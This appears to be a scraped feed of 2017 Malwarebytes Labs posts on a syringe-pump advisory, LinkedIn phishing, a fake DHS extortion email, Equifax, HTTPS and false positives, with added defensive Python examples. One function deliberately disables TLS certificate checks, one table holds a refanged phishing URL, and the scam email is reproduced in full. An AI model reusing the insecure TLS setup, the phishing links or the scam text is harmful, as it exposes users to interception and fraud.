A syringe pump is a small infusion pump that delivers liquids, either medication or nutrients, in small quantities into the patient’s system. Hospitals, nursing homes, and homes with residents under acute or palliative care use them. Accurate and safe delivery of dosages from a variety of syringes makes such a device essential. Unfortunately, a particular model of wireless smart pump has been found to be so vulnerable that a malicious, highly skilled attacker can compromise its communications and therapeutic modules, which in turn could also compromise a patient’s well-being.

Late last week, the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) released an advisory for the Medfusion 4000 Wireless Syringe Infusion Pump after Scott Gayou, an independent security researcher, brought to light multiple vulnerabilities in the device that can be exploited remotely.

According to Gayou, the syringe pump has problems with the way it processes data, which could lead to either unauthorized execution of code or a system crash. He also pointed out that several credentials are hard-coded into the pump, with some even accessible to anyone if the pump’s communication module is modified. Furthermore, the pump does not validate certificates, making it a good candidate for MitM attacks, allowing threat actors to bypass any security measures in place and gain elevated privileges on it.

Medfusion 4000 Wireless Syringe Infusion Pump versions 1.1, 1.5, and 1.6 are affected by these vulnerabilities.

Smiths Medical, makers of the said smart pump, has announced that they’ll be releasing version 1.6.1 of the product to address the vulnerabilities above. In the meantime, ICS-CERT has advised users of the Medfusion 4000 syringe pump to take steps to lessen the possibility of exploitation. One piece of advice is to disconnect the pump from the internet altogether.

Smiths Medical and ICS-CERT provided more mitigation steps in this advisory.
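The certificate-validation flaw above is worth seeing in code, because the difference between a client that can be intercepted and one that cannot is two settings. What follows is an added example written for this post, not code from Smiths Medical, ICS-CERT or the pump firmware: it builds, with Python’s standard `ssl` module, a permissive client context that mirrors the "accepts any certificate" behaviour described, beside a validating one, and an `audit()` helper that reports which protections a given context lacks. The CA bundle path is an assumption (for a device fleet it would typically be the manufacturer’s or hospital’s private CA).

```python
"""Weak versus corrected TLS client configuration, plus an audit of either."""
import socket
import ssl
from typing import List, Optional


def permissive_context() -> ssl.SSLContext:
    """What 'does not validate certificates' looks like: any certificate presented
    by whoever sits in the network path is accepted, so a MitM succeeds silently."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode can be lowered
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def validating_context(ca_bundle: Optional[str] = None) -> ssl.SSLContext:
    """Corrected configuration: verify the chain against a trusted CA set and
    check that the certificate actually names the host we dialled.
    ca_bundle is an assumed path; when given, ONLY that CA file is trusted
    (create_default_context skips the system store in that case), which is the
    pinning behaviour an embedded device talking to one backend should want."""
    ctx = ssl.create_default_context(cafile=ca_bundle)   # CERT_REQUIRED + check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2          # refuse legacy protocol versions
    return ctx


def audit(ctx: ssl.SSLContext) -> List[str]:
    """Return the list of MitM-relevant weaknesses in a client context (empty = fine)."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("server certificate chain is not verified")
    if not ctx.check_hostname:
        findings.append("certificate hostname is not checked")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("allows TLS versions older than 1.2")
    return findings


def connect_checked(host: str, port: int, ctx: ssl.SSLContext, timeout: float = 5.0) -> dict:
    """Open a connection with the given context and return the peer certificate
    subject. With validating_context() a forged or mismatched certificate raises
    ssl.SSLCertVerificationError instead of returning. Needs network; not run here."""
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            cert = tls.getpeercert()
            return {"subject": cert.get("subject", ()), "version": tls.version()}


if __name__ == "__main__":
    print("permissive:", audit(permissive_context()))
    print("validating:", audit(validating_context()))
```

Pointing `audit()` at the context an application really uses is a cheap review step; the two certificate findings are exactly the ones that turn an on-path attacker into a trusted peer.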


The Malwarebytes Labs Team



Remediation vs. prevention: How to place your bets

Malwarebytes - Wed, 09/13/2017 - 15:00

Building a security environment for businesses these days is a gamble: layer on too much and your programs may be canceling each other out or causing redundancy (and your leaders may be wondering why you’re spending so much). Invest too little and get breached: it’s snake eyes for you. Whether you choose remediation, proactive prevention, or both, finding the right balance is the key to a winning hand.

What is remediation?

Remediation is the process of correcting system changes, for example, removing threats off of an infected system. These threats bypassed existing security measures and likely already caused damage. The goal is to remediate threats before they cause any further damage.

In most cases, threats have made themselves known in some malicious fashion, making the need to remove them urgent. But the remediation process can potentially last anywhere from hours to days depending on the tools at hand and the resources dedicated to the process.

What is proactive prevention?

Proactive prevention is the ability to block the latest threats before they reach a system or network and cause damage. This form of protection requires technologies that detect and block unknown threats.

This is the most effective security approach in dealing with ransomware attacks. Once ransomware gets onto a system and encrypts the victim’s data, a ransom demand is presented to the victim requiring swift payment in digital currency in order to receive the files back via a decryption key. However, paying the ransom does not guarantee you’ll get your data back.

In rare cases, decryption programs or algorithms (decryptors) are available thanks to the valiant efforts of security researchers. Unfortunately, this reactive approach offers too small of a ray of hope in comparison to the sheer number of ransomware variants that continue to hit the streets every week.

Why are businesses sticking with remediation? Cost

Remediation tools, by nature, are less expensive than full protection. In addition, some businesses are adding remediation tools to run alongside their existing security measures. Due to budget constraints, many IT/Network Administrators wait before deciding on a full protection product.

For instance, a company of any size may be running an existing tool, like antivirus, with a three-year subscription. It may be easier for the company to let the contract run out before purchasing a new, more inclusive product. In this type of situation, adding a remediation tool to the existing security stack provides an additional, incremental value to security capabilities.

SMBs playing the odds

Many businesses assess their potential risk and exposure to attack, and many businesses, especially smaller ones, tend to believe there is less chance of an attack happening to them. In a survey conducted by CNBC and SurveyMonkey on over 2,000 small businesses, only 2 percent of small business owners said they viewed a cyberattack as the most critical issue they face. However, in the last year, malware detections increased more than 165 percent among SMBs.

With limited resources or a short-handed IT staff, small to mid-size businesses also face especially tight budgets on top of risk evaluation, so they need to allocate their spending accordingly. This is what they’ve always done, and they are not alone. Dell recently released a study that stated 53 percent of IT decision makers say cost is one of the biggest constraints to taking additional security measures.

Many believe it is easier to remediate a few errant incidents than to find several security solutions to combat various strains of malware. However, security incidents are increasing in frequency not only with enterprise-level businesses but also among small to mid-size businesses. In Malwarebytes’ recent report of Analysis of Malware Trends for Small to Medium Businesses Q1 2017, it was discovered that ransomware incidents alone rose 231% within the last year among SMBs.

Worst-case scenario

Ransomware is cause for concern for those using remediation-only methods because its damage cannot be undone unless rare decryptors are available. Businesses on a tight budget could compare the cost of proactive prevention tools to the potential ransom demands from a ransomware attack and the projected downtime in productivity. But even that estimation is tricky because there’s no guarantee cybercriminals will provide you with a key, process the transaction, or deliver clean code.

However, it is important to note that even if files are restored, the system or network can still be vulnerable because ransomware can leave behind remnants or the attacker may have planted more malicious code to utilize at a later date on the system. Other options include full wiping and rebuilding of machines and restoring from back up if the files are stored somewhere else, but that takes a lot of time, especially if multiple endpoints were impacted.

If a cyberattack were to hit an unprepared business, it can be a devastating event, causing a loss in productivity, loss of revenue, and even cause damage to the company’s reputation. For malware attacks other than ransomware, remediation tools are useful to run a full scan cleaning damage after the infection. But the truth is this: The remediation-only approach will simply not protect against a major ransomware attack.

How businesses benefit from proactive prevention

Threats are continuing to evolve and traditional security solutions are almost rendered obsolete. In order to effectively block these threats, security has to evolve as well. Here’s how the proactive approach benefits businesses:

1. It avoids risk and damage to endpoints.

With a proactive prevention tool, businesses see the value from the reduction in threat exposure. The less threat exposure, the less risk to the business.

2. It reduces/eliminates manual threat removal.

Forty-five percent of SANS survey respondents say that their prevention, detection, response and remediation processes are still mostly or completely manual. With a proactive prevention security tool, businesses eliminate the need for any manual threat removal because threats are caught earlier on and there are not as many remediation demands.

3. It reduces downtime.

It was discovered in the Osterman report that more than 60 percent of attacks take organizations more than nine hours to remediate. This is because of the need to manually remove threats as well as re-image machines where necessary. Without the manual process, time to remediate, or downtime, is significantly reduced.

4. It enables expert staff to focus on critical issues.

Remediation or reactive methods often require valuable resources and create a crisis due to the complexity of each threat. The administrator who removes the threats needs to have a certain level of expertise—often requiring skills that only few have. In Frost & Sullivan’s 2015 Global Information Workforce Study, researchers predict that there will be a shortage of 1.5 million information security experts by 2020, so the pool of talent is only getting smaller.

The shortage of capable admins causes additional issues for threat removal because it isn’t always as easy as clicking one button to disinfect the entire network; it can take hours to days away from productivity. Time can be spent on more valuable projects when admins are given the ability to run periodic scans to proactively check for anomalies.

Why do I have to choose?

You don’t have to choose. Remediation alone might not hold up against large-scale attacks, but it can provide great assistance if threats slip through the cracks. If you’re looking to add a layer of security to your existing tool belt, we recommend a strong remediation tool for post-incident cleanup and some peace of mind. On the other hand, proactive prevention stops an attack before an infection occurs, avoiding risk and reducing damage.

Remediation tools, like Malwarebytes Incident Response, can be deployed on top of existing traditional approaches to provide peace of mind for those “what if” instances if your existing security measures fail. Finding a product that delivers both, like Malwarebytes Endpoint Protection, ensures multiple attack vectors are covered from the start.



Compromised LinkedIn accounts used to send phishing links via private message and InMail

Malwarebytes - Tue, 09/12/2017 - 17:24

Phishing continues to be a favorite of criminals for harvesting user credentials with more or less sophisticated social engineering tricks. In this post, we take a look at a recent attack that uses existing LinkedIn user accounts to send phishing links to their contacts via private message, but also to external members via email.

What makes this campaign interesting is the abuse of long standing and trusted accounts that were hacked, including Premium membership accounts that have the ability to contact other LinkedIn users (even if they aren’t a direct contact) via the InMail feature. The fraudulent message includes a reference to a shared document and a link that redirects to a phishing site for Gmail and other email providers which require potential victims to log in.

Those who proceed will have their username, password, and phone number stolen but won’t realize they were duped right away. Indeed, this phishing scam ends on a tricky note with a decoy document on wealth management from Wells Fargo.

Private message

This message was received from a trusted and existing contact, although the time stamp is showing 12:17 AM, which is perhaps one of the red flags to be noted. The message talks about a shared Google Doc and gives a link to it, via the URL shortener.

Figure 1: An instant message from a contact directing to a phishing scam

Behind the shortened URL redirection

URL shorteners are a well-known vehicle for spreading malware and phishing scams but they are also used for legitimate purposes, especially on social media where long URLs tend to be too cumbersome. In this attack, the perpetrators are abusing both and a free hosting provider ( to redirect to the phishing page, itself hosted on a hacked website.

Figure 2: The redirection flow behind this phish
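The redirection flow in Figure 2 (shortener, free host, hacked site) is something an analyst can unwrap mechanically instead of clicking. Below is an added example, not Malwarebytes tooling, that follows a chain hop by hop using only the `Location` headers and then grades where it ends. The fetcher is injectable so the code runs offline here against a constructed response table built from the defanged indicators at the end of this post; the free-hosting suffix is a placeholder because the post does not name the provider, and a live fetcher would issue requests with automatic redirects disabled from an isolated analysis host.

```python
"""Resolve a shortened-URL redirect chain without fetching page bodies, then assess it."""
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import urljoin, urlparse

SHORTENERS = {"ow.ly", "bit.ly", "t.co", "goo.gl", "tinyurl.com"}        # well-known shorteners
FREE_HOSTING_SUFFIXES = (".freehost-placeholder.test",)                  # constructed placeholder

Fetcher = Callable[[str], Tuple[int, Optional[str]]]   # url -> (status, Location header or None)


def defang(url: str) -> str:
    return url.replace("http", "hxxp").replace(".", "[.]")


def refang(url: str) -> str:
    return url.replace("[.]", ".").replace("hxxp", "http")


def resolve_chain(start: str, fetch: Fetcher, max_hops: int = 8) -> Tuple[List[str], bool]:
    """Follow 3xx responses from start. Returns (chain, aborted); aborted is True when a
    loop or the hop limit was hit, which is itself worth flagging."""
    chain, seen, url = [start], {start}, start
    for _ in range(max_hops):
        status, location = fetch(url)
        if not (300 <= status < 400 and location):
            return chain, False                      # landed on a final page
        nxt = urljoin(url, location)                 # Location may be relative
        if nxt in seen:
            return chain, True                       # redirect loop
        chain.append(nxt)
        seen.add(nxt)
        url = nxt
    return chain, True                               # too many hops


def assess(chain: List[str]) -> dict:
    """Turn a resolved chain into a short list of analyst-facing findings."""
    hosts = [urlparse(u).hostname or "" for u in chain]
    findings = []
    if hosts[0] in SHORTENERS:
        findings.append("entry point is a URL shortener")
    if any(h.endswith(FREE_HOSTING_SUFFIXES) for h in hosts[1:]):
        findings.append("intermediate hop on free hosting")
    if len(set(hosts)) >= 3:
        findings.append("multi-stage redirection across %d hosts" % len(set(hosts)))
    final = chain[-1]
    if "/wp-" in urlparse(final).path:
        findings.append("final page under a WordPress path (often a compromised site)")
    return {"final_url": defang(final), "hops": len(chain) - 1, "findings": findings}


# Constructed response table reproducing the flow in this post's indicators:
# ow.ly link -> placeholder free host -> hacked WordPress site.
CONSTRUCTED_RESPONSES: Dict[str, Tuple[int, Optional[str]]] = {
    "https://ow.ly/qmxf30eWLyN": (301, "https://dgocs.FREEHOST-PLACEHOLDER.test/"),
    "https://dgocs.FREEHOST-PLACEHOLDER.test/": (302, "https://cakrabuanacsbali.com/wp-rxz/index.php"),
    "https://cakrabuanacsbali.com/wp-rxz/index.php": (200, None),
}


def constructed_fetch(url: str) -> Tuple[int, Optional[str]]:
    return CONSTRUCTED_RESPONSES.get(url, (404, None))


def analyze(defanged_start: str, fetch: Fetcher = constructed_fetch) -> dict:
    """Accept a defanged indicator, resolve it, and report with the result re-defanged."""
    chain, aborted = resolve_chain(refang(defanged_start), fetch)
    report = assess(chain)
    report["aborted"] = aborted
    return report


if __name__ == "__main__":
    print(analyze("hxxps://ow[.]ly/qmxf30eWLyN"))
```

Two hops, three distinct hosts, a free-hosting intermediary and a `/wp-` landing path together describe most credential-phishing chains of this kind; the `aborted` flag catches shortener loops and the "bounce forever" tricks some kits use against automated followers.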

Phishing for email credentials

This particular page is built as a Gmail phish, but will also ask for Yahoo or AOL user names and passwords. The main page is followed by an additional request for a phone number or secondary email address and ultimately the user sees a decoy Wells Fargo document hosted on Google Docs.

Figure 3: The phishing template, harvesting credentials and showing decoy content


Attackers are also abusing LinkedIn’s trusted InMail feature to send the same phishing link. As per LinkedIn, “InMail messages are sent directly to another LinkedIn member you’re not connected to.” This is an interesting aspect since it opens up the scope of the attack not only to the compromised account’s own contacts but also to other users.

This email was sent via LinkedIn and had a custom ‘Security Footer’. LinkedIn will send messages “that include a security footer message with your name and professional headline to help you distinguish authentic LinkedIn emails from ‘phishing’ email messages”, although LinkedIn does point out that this is no guarantee that the email is legitimate. In other words, the delivery method is to be trusted, but the content may not be. The same can be said for phishing pages that use HTTPS – which is the case here – making content delivery secure but the content itself fraudulent.

Figure 4: The phishing email received via LinkedIn that includes the ‘Security Footer’

However, there’s a caveat here. To use InMail, you need a Premium account which comes at a hefty monthly cost. There’s a good article by KnowBe4 detailing a phishing attack using LinkedIn’s own platform via InMail. The researchers showed how trivial it is to create a free account, start connecting with people, and finally upgrade to a Premium account in order to start sending scams via InMail. But the conclusion of their research is that this particular attack would not scale well due to limited InMail credits, making the operation way too expensive.

This limitation does not apply here though since the crooks are not creating (and paying for) their own accounts, but rather leveraging existing ones. Therefore, they have little to worry about burning free credits and tarnishing their victim’s reputation so long as it allows them to deliver their payload far and wide.

Personal security and its implications

We do not know how (malware, other phishing attacks, etc.) or how many LinkedIn accounts were compromised in this campaign. It’s also unclear whether the shortened URLs are unique per hacked account or not, although we think they might be. The user whose account was hacked had over 500 connections on LinkedIn and based on Hootsuite‘s stats, we know 256 people clicked on the phishing link.

Figure 5: A Premium member account with 500+ connections caught sending phishing link

This kind of attack via social media is not new – we have seen hacked Skype or Facebook accounts send spam – but it reminds us of how much more difficult it is to block malicious activity when it comes from long standing and trusted user accounts, not to mention work acquaintances or relatives. This also makes such attacks more credible to potential victims and can lead to a snowball effect when victims become purveyors of phishing links themselves.

If your LinkedIn account gets compromised, you should immediately review its settings to change your password and enable two-step verification (instructions here). Additionally, you can post a quick update on your timeline that lets your contacts know you were hacked and that any previous message you may have sent with links should be carefully vetted.

We’d like to thank @acfou for sharing a sample of this campaign with us.

Indicators of compromise

Phishing message:

I have just shared a document with you using GoogleDoc Drive, View shared document[]

Redirection and phishing page:

ow[.]ly/qmxf30eWLyN
dgocs[.]
dgocs[.]
cakrabuanacsbali[.]com/wp-rxz/index.php

Decoy Google Docs Wells Fargo file:



A week in security (September 4 – September 10)

Malwarebytes - Mon, 09/11/2017 - 19:53

Last week, we looked into expired domain names being used for malvertising, delved into dubious Facebook apps, and checked out Chinese seminar scams. We also explained the whys and wherefores of false positives, explained what Google is doing with HTTPS, warned you away from a fake DHS email, and outlined some early information about the Equifax breach.



Stay safe!

Malwarebytes Lab Team





Fake DHS email – “Give us $350 in the next 24 hours”

Malwarebytes - Fri, 09/08/2017 - 15:00

Who likes threats?

Nobody, as it turns out. That hasn’t stopped scammers from jumping on the menacing email train – next stop, your inbox.

Every now and then, we see the 419 “Hitman deployed to kill you” missive doing the rounds. On a similar threatening note, we have a fake DHS notification telling you to pay a $350 fee within 24 hours – or else.

The email reads as follows (we’ve put the meatiest threats in bolded text):


You are to contact the U.S. Department of Homeland Security (DHS) Washington, D.C to obtain your Clearance Certificate, find below their contact information:

Contact Person: Stevan Bunnell
General Counsel
U.S. Department of Homeland Security (DHS)
Washington DC Mailing Address U.S. Department of Homeland Security Washington, D.C. 20528.

Ensure you contact (DHS) with your Full Name, Address and phone number/cell number.
Contact the DHS via Email with the information above immediately, once you contact them I will get back to you or else I will have an agent come visit you at home for questioning.

Furthermore, be advised that according to the United State Law together with the Federal Bureau of Investigation rules and regulations, you are to obtain the document from the DHS. Also note that you are to take care of the cost of the Clearance Certificate, which will be issued in your name. Due to the content of the Clearance Certificate and how important and secured the document is, you as the beneficiary will send the DHS the sum of $350 Dollars only for the issuing of the Clearance Certificate. That is the lay down rules for the DHS to release such sensitive document; DHS will issue you the authentic and original copy of the Clearance Certificate with a seal on it for verification and approval.

You are hereby advised to Contact them through the email address above to make an inquiry concerning how you will send the official fee to them. Note that you are to observe this immediately, if you really want your funds to be credited to your personal bank account and to avoid any legal battle with the security operatives over this matter. We have already informed the DHS about the present situation go ahead and contact them immediately.
Your funds are under our custody and will not be released to you unless the required document is confirmed, after that the fund will be release to you immediately without any delay.

NOTE: We have asked for the above document to make available the most completed and up-to date records possible for no criminal justice purposes. The documents will clarify the intensity of this fund; exonerate it from money laundry, scam and terrorism.

WARNING: Failure to provide the above requirement in the next 24 hours, legal action will be taken immediately by arresting and detaining you as soon as international court of justice issues a warrant of arrest, if you are found guilty, you will be jailed as terrorism, drug trafficking and money laundering is a serious problem in our community today and the world at large. The F.B.I will not stop at any length in tracking down and prosecuting any criminal who indulges in this criminal act. Nobody is above the law and the law is not a respecter of anybody. We presume you are law abiding and would not want to have scuffles with the authority, in and outside of the United States.

We are charged with the responsibility of implementing legal norms and our authority is irrevocable so don’t dare dispute our instruction, just act as instructed. The person you know will not help you in this matter rather abide by this instruction.

Note: You are to contact DHS with your full names, phone number/cell number and full address via the email which I stated above immediately, for the processing of your Clearance Certificate within the next 48 hours.

Faithfully Yours
Thomas Dinapoli
Office of the New York State Comptroller

That’s quite the barrage of “pay up”, and could well scare some people into handing over whatever the scammers ask for (and we’d be surprised if they stop at the $350). Should you receive one of these emails, simply delete it and go on with your day – nobody is coming to collect money from you.


Christopher Boyd




Equifax breach: What you need to know

Malwarebytes - Fri, 09/08/2017 - 07:02

On July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax’s overall security posture.

According to Equifax, online criminals maintained their presence from mid-May through July 2017 and had access to:

  • Names
  • Social Security numbers
  • Birth dates
  • Addresses
  • Driver’s license numbers (in some cases)
  • Credit card numbers (for approx. 209,000 U.S. consumers)

It also said that some personal information for certain UK and Canadian residents was part of this breach.

This is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.

Equifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. More information about this breach and how to apply for ID theft protection can be found by going to, a website Equifax has just set up.



Google reminds website owners to move to HTTPS before October deadline

Malwarebytes - Thu, 09/07/2017 - 15:36

With the release of Chrome v62 in less than 3 months, Google will begin marking non-HTTPS pages with text input fields—like contact forms and search bars—and all HTTP websites viewed in Incognito mode as “NOT SECURE” in the address bar. In August, the company started sending warning emails to website owners as a follow-up to an announcement by Emily Schechter, Product Manager of the Chrome Security Team, back in April.

Google began marking sites in Chrome v56, which was issued in January of this year. They targeted HTTP sites that collect user passwords and credit card details.

For owners to secure the information being shared among their visitors and their web server, they must start incorporating an SSL certificate. Failing to do this is risky for both parties: sites that allow the sending of information in clear text may also allow its exposure through the Internet.

Ms. Schechter also provided website owners with a handy guide on how to enable HTTPS on their servers. An additional guideline on how to avoid the “NOT SECURE” warning on Chrome is also available for web developers.

Looking at the way things are panning out, we can be confident that HTTPS will be the norm in no time. However, this doesn’t mean that all sites using SSL certificates can and should be trusted.

Google intended to separate phishing sites from legitimate ones with the marking of insecure sites, as Help Net Security noted in an article. Unfortunately, the introduction of new browser versions capable of flagging sites also promptly introduced more phishing sites using HTTPS. We’ve been seeing examples of this in the wild, as well, the latest of which was an Apple phishing campaign.

Discerning phishing pages from the real ones has become more challenging than ever. This is why it’s important for users to familiarize themselves with other signs that they might be on a phishing page apart from the lack of SSL certificates. Fortunately, users don’t have to look far from the address bar when they want to double-check that they’re on the right page before entering their credentials or banking details. Keep in mind the following when scrutinizing URLs and other elements around it:

  • Look for letters in the URL that may have been made to look like another letter or number, or there may be additional letters or numbers in the URL. For example, may appear as—Catch that? The double ‘v’ together makes it look like the letter ‘w.’ This is an example of typosquatting. Here’s another example:—the ‘l’ in “example” is actually the number one.
  • Look for an Extended Validation Certificate (EV SSL). You know that a trusted website has this when you see a company name beside the URL, as you can see from the below UK PayPal address. Not all sites with SSL have this, unfortunately, but some of the trusted brands online already use EV SSL, such as Bank of America, eBay, Apple, and Microsoft.

Lastly, be aware that phishers may use a free SSL certificate in their campaign to make it appear legitimate. They may also hijack sites that already have SSL in place, adding more to the veil of legitimacy they want to attain.
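The URL tricks listed above (a doubled ‘v’ for ‘w’, a ‘1’ for ‘l’, and the look-alike letters from other alphabets that hide behind punycode) can be reduced to a single comparison: normalize the hostname into a visual "skeleton" and see whether it collides with a brand the user actually uses. The block below is an added example, not Google’s or Malwarebytes’ code; the brand allow-list, the sample hostnames and the small homoglyph table are constructed, and the "last two labels" approximation of the registrable domain is an assumption that ignores suffixes such as co.uk.

```python
"""Detect look-alike hostnames by comparing visual skeletons against known brands."""
import unicodedata
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Constructed allow-list: the login pages this user really has accounts on.
KNOWN_BRANDS = {"paypal.com", "example.com"}

# A few Cyrillic/Greek letters that render like Latin ones (small subset; assumption).
HOMOGLYPHS = str.maketrans({"а": "a", "е": "e", "о": "o", "р": "p", "с": "c",
                            "х": "x", "у": "y", "і": "i", "ο": "o", "α": "a"})
# ASCII confusables: digits standing in for letters, and letter pairs that fuse visually.
DIGIT_MAP = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})
PAIR_MAP = [("vv", "w"), ("rn", "m"), ("cl", "d")]


def decode_idna(host: str) -> str:
    """Punycode (xn--) labels are what the browser shows as foreign letters; compare on those."""
    if "xn--" in host:
        try:
            return host.encode("ascii").decode("idna")
        except UnicodeError:
            return host
    return host


def skeleton(host: str) -> str:
    """Collapse a hostname to what a human would perceive at a glance."""
    s = unicodedata.normalize("NFKC", decode_idna(host).lower())
    s = s.translate(HOMOGLYPHS).translate(DIGIT_MAP)
    for pair, single in PAIR_MAP:
        s = s.replace(pair, single)
    return s


def registrable(host: str) -> str:
    """Naive eTLD+1: the last two labels (assumption; ignores co.uk-style suffixes)."""
    return ".".join(host.split(".")[-2:])


def check_url(url: str) -> Dict[str, Optional[str]]:
    """Classify a URL as match / lookalike / brand_in_subdomain / unknown."""
    host = decode_idna(urlparse(url).hostname or "")
    reg = registrable(host)
    if reg in KNOWN_BRANDS:
        return {"host": host, "verdict": "match", "brand": reg}
    reg_skel = skeleton(reg)
    for brand in KNOWN_BRANDS:
        if reg_skel == skeleton(brand):          # looks like the brand but is not it
            return {"host": host, "verdict": "lookalike", "brand": brand}
    labels = set(host.split("."))
    for brand in KNOWN_BRANDS:
        if brand.split(".")[0] in labels:        # e.g. paypal.com.something.test
            return {"host": host, "verdict": "brand_in_subdomain", "brand": brand}
    return {"host": host, "verdict": "unknown", "brand": None}


if __name__ == "__main__":
    for sample in ("https://www.paypal.com/signin", "https://paypa1.com/login",
                   "https://exarnple.com/", "https://paypal.com.account-verify.test/"):
        print(sample, "->", check_url(sample)["verdict"])
```

Note what this check does not do: it says nothing about whether the page has a certificate, which is the point of the paragraph above. A free certificate on `paypa1.com` still yields a lookalike verdict, and a hijacked legitimate site falls through as `unknown`, which is why the skeleton comparison is a complement to, not a replacement for, looking at the EV company name.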


The post Google reminds website owners to move to HTTPS before October deadline appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: False positives

Malwarebytes - Thu, 09/07/2017 - 15:00
What are false positives?

False positive, which is sometimes written as f/p, is an expression commonly used in cybersecurity to denote that a file or setting has been flagged as malicious when it’s not.

In statistics, false positives are called Type I errors, because the test checks for a particular condition and wrongly gives an affirmative (positive) decision. The opposite is the false negative, or Type II error, which concludes that a particular condition is not present when, in fact, it is. In this blog post, we will focus on false positives in cybersecurity, but note that false negatives in this field are commonly referred to as “misses.” So “misses” are malicious files or malicious behavior that the scanner or protection software did not detect.

Possible causes of false positives

The most common causes of false positives are:

  • Heuristics: decisions are made on minimal bits of information
  • Behavioral analysis: decisions are made based on behavior, and the legitimate file shows behavior that is usually considered malicious
  • Machine learning: sometimes we see the effects of “garbage in, garbage out,” or more politely put, “training did not take certain situations into account.”

Let’s give some examples of these causes.

An example rule for a heuristic detection could be this: if this file claims to be from Microsoft, but it is not signed with the Microsoft certificate, then we assume the file has malicious intentions. A false positive could occur in the rare case that Microsoft forgot to sign the file.

One detection vector in spotting the behavior of ransomware is if a program starts deleting shadow copies. Some ransomware families do this to ensure the victim has no backups. But you can imagine a cleanup utility that deletes old shadow copies, which could possibly be flagged as displaying malicious activity, right?

Machine learning is done by feeding the system vast amounts of training data. Mistakes or ambiguities in the training data can lead to errors in the detections.

Designing detection rules for yet-unknown malicious files or behavior is always a balance between covering as many of them as possible and not triggering any false positives, and, understandably, this can sometimes go wrong.
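The heuristic rule from the post (claims to be from Microsoft but is not signed by Microsoft) can be run over a small set of constructed file records to show where the Type I error (false positive) and the Type II error (a "miss") come from. This is an added example, not code from the original post; the sample files are invented for illustration.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass(frozen=True)
class FileSample:
    name: str
    claimed_publisher: str      # publisher string the file carries in its version info
    signer: Optional[str]       # who signed the file; None when it is unsigned
    is_malicious: bool          # ground truth, known only to the evaluator


def heuristic_flags(sample: FileSample) -> bool:
    """The post's example rule: a file that claims to be from Microsoft but is
    not signed by Microsoft is assumed to have malicious intentions."""
    return sample.claimed_publisher == "Microsoft" and sample.signer != "Microsoft"


def confusion_counts(samples: List[FileSample],
                     rule: Callable[[FileSample], bool]) -> Dict[str, int]:
    """Count TP/FP/TN/FN for a rule against ground truth.
    FP is the Type I error (false positive); FN is the Type II error (a miss)."""
    counts = {"TP": 0, "FP": 0, "TN": 0, "FN": 0}
    for s in samples:
        flagged = rule(s)
        if flagged and s.is_malicious:
            counts["TP"] += 1
        elif flagged:
            counts["FP"] += 1
        elif s.is_malicious:
            counts["FN"] += 1
        else:
            counts["TN"] += 1
    return counts


def false_positives(samples: List[FileSample],
                    rule: Callable[[FileSample], bool]) -> List[str]:
    """Names of legitimate files the rule wrongly flagged."""
    return [s.name for s in samples if rule(s) and not s.is_malicious]


# Constructed sample set (names and publishers are made up for the example).
SAMPLES = [
    FileSample("calc.exe", "Microsoft", "Microsoft", False),      # signed, benign
    FileSample("upd4te.exe", "Microsoft", None, True),            # unsigned impostor
    FileSample("dropper.exe", "Microsoft", "Shady Co", True),     # wrong signer
    FileSample("hotfix.exe", "Microsoft", None, False),           # Microsoft forgot to sign
    FileSample("editor.exe", "Example Editor", "Example Editor", False),
    FileSample("stealer.exe", "Acme", None, True),                # rule never looks at it
]
```

Running `confusion_counts(SAMPLES, heuristic_flags)` shows one false positive (the unsigned but legitimate hotfix) and one miss (the file that never claimed to be from Microsoft), the trade-off the paragraph above describes.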

Fun facts

A much less common cause for false detections is deliberate false positives. The most well-known false positive is the EICAR test file, a computer file that was developed by the European Institute for Computer Antivirus Research to verify the response of antivirus programs without having to use real malware. Note that Malwarebytes for Windows does not detect the EICAR file and Malwarebytes for Mac only detects it under exceptional circumstances. This is by design.

But history has also brought us deliberate false positives as a way to test whether an anti-malware product is using detections made by its competitors.


False positives are alarms raised for files or behavior flagged as malicious when, in fact, no bad intentions were present. They are caused by rules that try to catch as many malicious events as possible, and which sometimes fail by picking up something legitimate.


Pieter Arntz

The post Explained: False positives appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Nigerian scams without the Nigerians

Malwarebytes - Wed, 09/06/2017 - 23:00

Users in English speaking countries are quite familiar with the Nigerian scam: an important guy in Nigeria needs your help getting his money out of the country and if you assist with some transaction fees, a chunk of his fortune could be yours. But what about non-English speaking countries? What forms the baseline level of internet crap? Today we’re going to look at the Chinese version – the seminar scam.

Step 1: the pitch

This is actually more common via SMS, presumably due to limited mobile spam tools. The subject line will reference upcoming training for generic business skills like project management, bookkeeping, or HR.

项目领导力总结—8月23-24日学吧 《项目领导力》 (“Project leadership summary: come and study on August 23–24, ‘Project Leadership’”)

This particular message we received is advertising a “project leadership” seminar.

These pitches vary in topic, generally staying around vague business topics and are so common that almost any Chinese internet user is likely to see one eventually. The provided mobile number doesn’t show any results besides more spam and the QQ isn’t registered to any notable groups. Generally, the accounts associated with these emails are used exclusively for the scam.

Step 2: the form

Naturally, we want to attend said seminar, so we sent a response asking how to register. Within a day, the scammer responded:

He’s referencing a file that has a detailed agenda, as well as registration info. He also wants our Weixin, so that we can “maintain a long-term relationship.”

